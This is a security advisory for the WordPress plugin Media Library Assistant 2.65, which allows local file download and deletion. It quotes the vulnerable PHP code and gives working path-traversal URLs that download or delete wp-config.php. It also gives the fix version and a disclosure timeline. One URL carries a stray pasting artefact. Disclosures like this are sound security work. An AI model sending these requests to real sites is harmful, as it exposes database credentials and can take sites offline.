Plugin Media Library Assistant 2.65 RCE – Unlink / Local File Download

Details

  • Name : Media Library Assistant
  • Version : 2.65
  • Homepage : https://pt.wordpress.org/plugins/media-library-assistant/

Type

  • Local File Domwload LFD
  • Remote Code Execution - RCE
  • Vulnerabilities discovered

Description

  • Type user access: administrator / editor /author users.
  • Parameter no escape:
    • $_REQUEST['mla_download_file']
    • $_REQUEST['mla_download_type']
    • $_REQUEST['mla_download_disposition']

Code

File: wp-content/plugins/media-library-assistant/includes/class-mla-main.php Line: 756 - 779 
if ( isset( $_REQUEST['mla_download_file'] ) && isset( $_REQUEST['mla_download_type'] ) ) {
   if( ini_get( 'zlib.output_compression' ) ) {
      ini_set( 'zlib.output_compression', 'Off' );
   }

   $file_name = stripslashes( $_REQUEST['mla_download_file'] );
...
if ( isset( $_REQUEST['mla_download_disposition'] ) && 'delete' == $_REQUEST['mla_download_disposition'] ) {
   @unlink( $file_name );
}
...
 

Proof Concept

1 - Log in with administrator / editor / author user.
2 - Access url: http://target/wp-admin/upload.php?page=mla-menu
3 -  Capture a url to download some picture.

4 - Change and insert parameters to attack and run in url. Example:
http://target/wp-admin/upload.php?mla_admin_nonce=01dc26b197&page=mla-menu&mla_download_file=%2Fsrv%2Fwww%2Fwordpress-develop%2Fpublic_html%2Fsrc%2Fwp-content%2Fuploads%2Fstar-wars-5.jpg&mla_download_type=image/jpeg
Only to Download File:
http://target/wp-admin/upload.php?mla_admin_nonce=01dc26b197&page=mla-menu&mla_download_file=../wp-config.php&mla_download_type=application/force-download
To delete File:
http://target/wp-admin/upload.php?mla_admin_nonce=01dc26b197&page=mla-menu&mla_download_file=../wp-config.php&mla_download_type=application/force-download&mla_download_dispositio%MCEPASTEBIN%n=delete

Results

wp-config deleted and restart the all system.

Note

Solution

https://wordpress.org/plugins/media-library-assistant/#developers

2.70

  • New: A new Debug logging category has been created for “where-used” reporting.
  • New: The Att. Categories and Att. Tags taxonomies can now be displayed a columns on the Media/Library list mode admin submenu.
  • Fix: File downloads originating from a Bulk Action are now restricted to the site’s uploads directory tree

Timeline

  • Date Discovery : 12/29/2017
  • Date Vendor Contact : 01/03/2018
  • Date Publish : 01/04/2018
  • Date Resolution : 01/04/2018
Back to Top